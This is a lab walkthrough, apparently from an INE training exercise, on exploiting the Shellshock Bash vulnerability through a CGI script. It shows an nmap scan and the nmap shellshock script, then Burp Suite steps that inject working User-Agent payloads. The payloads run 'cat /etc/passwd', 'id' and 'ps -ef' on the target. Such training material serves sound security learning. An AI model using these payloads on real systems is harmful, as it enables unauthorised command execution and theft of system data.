Linux Vulnerabilities
Shellshock (CVE-2014-6271)
Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (since V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.
The Shellshock vulnerability was discovered by Stéphane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.
Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.
Initial Scan
┌──(root㉿INE)-[~]
└─# sudo nmap -A demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-29 20:17 IST
Nmap scan report for demo.ine.local (192.181.152.3)
Host is up (0.000067s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (Unix)
MAC Address: 02:42:C0:B5:98:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/29%OT=80%CT=1%CU=30970%PV=N%DS=1%DC=D%G=Y%M=0242
OS:C0%TM=692B07AA%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=Z%
OS:TS=A)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=
OS:M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WI
OS:N(W1=7C70%W2=7C70%W3=7C70%W4=7C70%W5=7C70%W6=7C70)ECN(R=Y%DF=Y%T=40%W=7D
OS:78%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3
OS:(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.07 ms demo.ine.local (192.181.152.3)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.76 secondsA CGI script is running on the target server.
Shell sock Nmap scan
nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" demo.ine.local 
Exploitation with Burp
Start Burp Suite, navigate to proxy, and turn on the intercept.
Reload the page and intercept the request with Burp Suite.
Right-click and select “Send to Repeater” Option and Navigate to the Repeater tab.
Modify the User-Agent and inject the malicious payload.
Payload:
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
The command executed successfully.
Modify the payload to execute the ‘id’ command.
Payload:
() { :; }; echo; echo; /bin/bash -c 'id'
Step 13: Modify the payload to execute ‘ps -ef’ command.
Payload:
() { :; }; echo; echo; /bin/bash -c 'ps -ef'
Last updated